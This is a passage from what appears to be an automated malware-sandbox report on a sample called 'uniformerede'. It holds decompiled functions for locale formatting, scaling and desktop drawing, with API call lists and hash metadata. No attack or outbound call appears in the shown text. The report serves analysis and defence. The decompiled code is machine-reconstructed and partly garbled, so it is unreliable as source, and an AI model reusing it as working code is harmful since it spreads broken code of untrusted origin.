                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            • CharToOemA.USER32 ref: 0040D08F
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040D0EF
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0040D105
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                            • String ID: LI
                                                                                                                                                                                                                            • API String ID: 185507032-1163166679
                                                                                                                                                                                                                            • Opcode ID: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                                                                                                                                                                                            • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043AB98 Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43ad44; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43ad3c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43ad44; // 0x0
				if(_t113 != (_t107 &  *0x43ad40)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43ad44; // 0x0
				if(_t114 != (_t107 &  *0x43ad48)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                                                                                                                                                                            0x0043ab9f
                                                                                                                                                                                                                            0x0043aba2
                                                                                                                                                                                                                            0x0043aba4
                                                                                                                                                                                                                            0x0043aba9
                                                                                                                                                                                                                            0x0043ad26
                                                                                                                                                                                                                            0x0043ad26
                                                                                                                                                                                                                            0x0043ad2b
                                                                                                                                                                                                                            0x0043ad38
                                                                                                                                                                                                                            0x0043ad38
                                                                                                                                                                                                                            0x0043abb3
                                                                                                                                                                                                                            0x0043abbd
                                                                                                                                                                                                                            0x0043abb5
                                                                                                                                                                                                                            0x0043abb5
                                                                                                                                                                                                                            0x0043abb5
                                                                                                                                                                                                                            0x0043abc6
                                                                                                                                                                                                                            0x0043abda
                                                                                                                                                                                                                            0x0043abc8
                                                                                                                                                                                                                            0x0043abd6
                                                                                                                                                                                                                            0x0043abd6
                                                                                                                                                                                                                            0x0043abe0
                                                                                                                                                                                                                            0x0043abf9
                                                                                                                                                                                                                            0x0043abe2
                                                                                                                                                                                                                            0x0043abf0
                                                                                                                                                                                                                            0x0043abf0
                                                                                                                                                                                                                            0x0043ac00
                                                                                                                                                                                                                            0x0043ac3a
                                                                                                                                                                                                                            0x0043ac3d
                                                                                                                                                                                                                            0x0043ac08
                                                                                                                                                                                                                            0x0043ac0b
                                                                                                                                                                                                                            0x0043ac2f
                                                                                                                                                                                                                            0x0043ac34
                                                                                                                                                                                                                            0x0043ac0d
                                                                                                                                                                                                                            0x0043ac1e
                                                                                                                                                                                                                            0x0043ac20
                                                                                                                                                                                                                            0x0043ac20
                                                                                                                                                                                                                            0x0043ac0b
                                                                                                                                                                                                                            0x0043ac44
                                                                                                                                                                                                                            0x0043ac49
                                                                                                                                                                                                                            0x0043ac8d
                                                                                                                                                                                                                            0x0043ac51
                                                                                                                                                                                                                            0x0043ac59
                                                                                                                                                                                                                            0x0043ac84
                                                                                                                                                                                                                            0x0043ac5b
                                                                                                                                                                                                                            0x0043ac70
                                                                                                                                                                                                                            0x0043ac70
                                                                                                                                                                                                                            0x0043ac59
                                                                                                                                                                                                                            0x0043aca5
                                                                                                                                                                                                                            0x0043acb3
                                                                                                                                                                                                                            0x0043acbb
                                                                                                                                                                                                                            0x0043acce
                                                                                                                                                                                                                            0x0043acce
                                                                                                                                                                                                                            0x0043acdc
                                                                                                                                                                                                                            0x0043ace4
                                                                                                                                                                                                                            0x0043acf7
                                                                                                                                                                                                                            0x0043acf7
                                                                                                                                                                                                                            0x0043ad01
                                                                                                                                                                                                                            0x0043ad21
                                                                                                                                                                                                                            0x0043ad21
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                                                            • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043BA38 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E0043BA38(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00407640();
				_v16 = _t33;
				_push(_t92);
				_push(0x43bb53);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E00425610( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x43bb5a);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407888();
				return _t72;
			}





















                                                                                                                                                                                                                            0x0043ba39
                                                                                                                                                                                                                            0x0043ba3b
                                                                                                                                                                                                                            0x0043ba41
                                                                                                                                                                                                                            0x0043ba4d
                                                                                                                                                                                                                            0x0043ba53
                                                                                                                                                                                                                            0x0043ba63
                                                                                                                                                                                                                            0x0043ba6a
                                                                                                                                                                                                                            0x0043ba6b
                                                                                                                                                                                                                            0x0043ba6c
                                                                                                                                                                                                                            0x0043ba6d
                                                                                                                                                                                                                            0x0043ba6e
                                                                                                                                                                                                                            0x0043ba55
                                                                                                                                                                                                                            0x0043ba55
                                                                                                                                                                                                                            0x0043ba5c
                                                                                                                                                                                                                            0x0043ba5d
                                                                                                                                                                                                                            0x0043ba5e
                                                                                                                                                                                                                            0x0043ba5f
                                                                                                                                                                                                                            0x0043ba60
                                                                                                                                                                                                                            0x0043ba60
                                                                                                                                                                                                                            0x0043ba74
                                                                                                                                                                                                                            0x0043ba77
                                                                                                                                                                                                                            0x0043ba7c
                                                                                                                                                                                                                            0x0043ba7e
                                                                                                                                                                                                                            0x0043ba81
                                                                                                                                                                                                                            0x0043ba82
                                                                                                                                                                                                                            0x0043ba87
                                                                                                                                                                                                                            0x0043ba8c
                                                                                                                                                                                                                            0x0043ba8d
                                                                                                                                                                                                                            0x0043ba92
                                                                                                                                                                                                                            0x0043ba95
                                                                                                                                                                                                                            0x0043baaa
                                                                                                                                                                                                                            0x0043bab6
                                                                                                                                                                                                                            0x0043babe
                                                                                                                                                                                                                            0x0043bacb
                                                                                                                                                                                                                            0x0043baed
                                                                                                                                                                                                                            0x0043bb0c
                                                                                                                                                                                                                            0x0043bb26
                                                                                                                                                                                                                            0x0043bb33
                                                                                                                                                                                                                            0x0043bb3a
                                                                                                                                                                                                                            0x0043bb3d
                                                                                                                                                                                                                            0x0043bb40
                                                                                                                                                                                                                            0x0043bb48
                                                                                                                                                                                                                            0x0043bb49
                                                                                                                                                                                                                            0x0043bb4c
                                                                                                                                                                                                                            0x0043bb4d
                                                                                                                                                                                                                            0x0043bb52

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0043BA6F
                                                                                                                                                                                                                            • 73C9ACE0.USER32(?,00000000,00000402), ref: 0043BA82
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0043BAA5
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043BACB
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043BAED
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043BB0C
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043BB26
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0043BB33
                                                                                                                                                                                                                            • 73C9B380.USER32(?,?,0043BB5A,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0043BB4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ObjectSelect$B380DesktopWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 989747725-0
                                                                                                                                                                                                                            • Opcode ID: 1bbbec0ae95a970e8fbfea3617b8bca78539cc0793b36e6b4bd19b83dc557e65
                                                                                                                                                                                                                            • Instruction ID: e1e64ebeb7b5d23d6db400034beff9ba963c624bbe95d31bbb4f2864b739462b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbbec0ae95a970e8fbfea3617b8bca78539cc0793b36e6b4bd19b83dc557e65
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7310AB6E04619AFDB01DEEDCC85EAFBBBCEF09704B408465B504F7241C679AD008BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E2E8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e5b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040E174();
				E0040CA14(__ebx, __edi, __esi);
				_t196 =  *0x49e750;
				if( *0x49e750 != 0) {
					E0040CBEC(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C964(_t43, 0, 0x14,  &_v20);
				E00404A14(0x49e684, _v20);
				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A14(0x49e690, _v36);
				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A14(0x49e694, _v44);
				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
				E00404A14(0x49e69c, _v52);
				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
				E00404A14(0x49e6a0, _v56);
				E004049C0( &_v12);
				E004049C0( &_v16);
				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
				_t104 = E00409664(0x40e5c8, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404A58( &_v8, 0x40e620);
				} else {
					E00404A58( &_v8, 0x40e614);
				}
				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
				_t111 = E00409664(0x40e5c8, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
					if(E00409664(0x40e5c8, 0, _t198) != 0) {
						E00404A58( &_v12, 0x40e63c);
					} else {
						E00404A58( &_v16, 0x40e62c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404D40();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404D40();
				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E5BA);
				return E004049E4( &_v68, 0x10);
			}

























                                                                                                                                                                                                                            0x0040e2e8
                                                                                                                                                                                                                            0x0040e2e8
                                                                                                                                                                                                                            0x0040e2e9
                                                                                                                                                                                                                            0x0040e2eb
                                                                                                                                                                                                                            0x0040e2f0
                                                                                                                                                                                                                            0x0040e2f0
                                                                                                                                                                                                                            0x0040e2f2
                                                                                                                                                                                                                            0x0040e2f4
                                                                                                                                                                                                                            0x0040e2f4
                                                                                                                                                                                                                            0x0040e2f7
                                                                                                                                                                                                                            0x0040e2fa
                                                                                                                                                                                                                            0x0040e2fb
                                                                                                                                                                                                                            0x0040e300
                                                                                                                                                                                                                            0x0040e303
                                                                                                                                                                                                                            0x0040e306
                                                                                                                                                                                                                            0x0040e30b
                                                                                                                                                                                                                            0x0040e310
                                                                                                                                                                                                                            0x0040e317
                                                                                                                                                                                                                            0x0040e319
                                                                                                                                                                                                                            0x0040e319
                                                                                                                                                                                                                            0x0040e323
                                                                                                                                                                                                                            0x0040e332
                                                                                                                                                                                                                            0x0040e33f
                                                                                                                                                                                                                            0x0040e354
                                                                                                                                                                                                                            0x0040e363
                                                                                                                                                                                                                            0x0040e378
                                                                                                                                                                                                                            0x0040e387
                                                                                                                                                                                                                            0x0040e39a
                                                                                                                                                                                                                            0x0040e3ad
                                                                                                                                                                                                                            0x0040e3c2
                                                                                                                                                                                                                            0x0040e3d1
                                                                                                                                                                                                                            0x0040e3e4
                                                                                                                                                                                                                            0x0040e3f9
                                                                                                                                                                                                                            0x0040e404
                                                                                                                                                                                                                            0x0040e411
                                                                                                                                                                                                                            0x0040e426
                                                                                                                                                                                                                            0x0040e431
                                                                                                                                                                                                                            0x0040e43e
                                                                                                                                                                                                                            0x0040e451
                                                                                                                                                                                                                            0x0040e466
                                                                                                                                                                                                                            0x0040e473
                                                                                                                                                                                                                            0x0040e488
                                                                                                                                                                                                                            0x0040e495
                                                                                                                                                                                                                            0x0040e49d
                                                                                                                                                                                                                            0x0040e4a5
                                                                                                                                                                                                                            0x0040e4ba
                                                                                                                                                                                                                            0x0040e4c4
                                                                                                                                                                                                                            0x0040e4c9
                                                                                                                                                                                                                            0x0040e4cb
                                                                                                                                                                                                                            0x0040e4e4
                                                                                                                                                                                                                            0x0040e4cd
                                                                                                                                                                                                                            0x0040e4d5
                                                                                                                                                                                                                            0x0040e4d5
                                                                                                                                                                                                                            0x0040e4f9
                                                                                                                                                                                                                            0x0040e503
                                                                                                                                                                                                                            0x0040e508
                                                                                                                                                                                                                            0x0040e50a
                                                                                                                                                                                                                            0x0040e51c
                                                                                                                                                                                                                            0x0040e52d
                                                                                                                                                                                                                            0x0040e546
                                                                                                                                                                                                                            0x0040e52f
                                                                                                                                                                                                                            0x0040e537
                                                                                                                                                                                                                            0x0040e537
                                                                                                                                                                                                                            0x0040e52d
                                                                                                                                                                                                                            0x0040e54b
                                                                                                                                                                                                                            0x0040e54e
                                                                                                                                                                                                                            0x0040e551
                                                                                                                                                                                                                            0x0040e556
                                                                                                                                                                                                                            0x0040e563
                                                                                                                                                                                                                            0x0040e568
                                                                                                                                                                                                                            0x0040e56b
                                                                                                                                                                                                                            0x0040e56e
                                                                                                                                                                                                                            0x0040e573
                                                                                                                                                                                                                            0x0040e580
                                                                                                                                                                                                                            0x0040e593
                                                                                                                                                                                                                            0x0040e59a
                                                                                                                                                                                                                            0x0040e59d
                                                                                                                                                                                                                            0x0040e5a0
                                                                                                                                                                                                                            0x0040e5b2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                            • Opcode ID: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                                                                                                                                                                                            • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004388F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00438D40(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x49dbcc; // 0x49ebb8
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E00441704(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x437498; // 0x4374e4
						__eflags = E00403D78( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00441704( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00438884);
						_push(GetCurrentThreadId());
						L004075C8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403DE8(_t101, _t126);
						_t78 =  *0x49eb38; // 0x0
						_t110 =  *0x4360a0; // 0x4360ec
						if(E00403D78(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x49eb38; // 0x0
						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
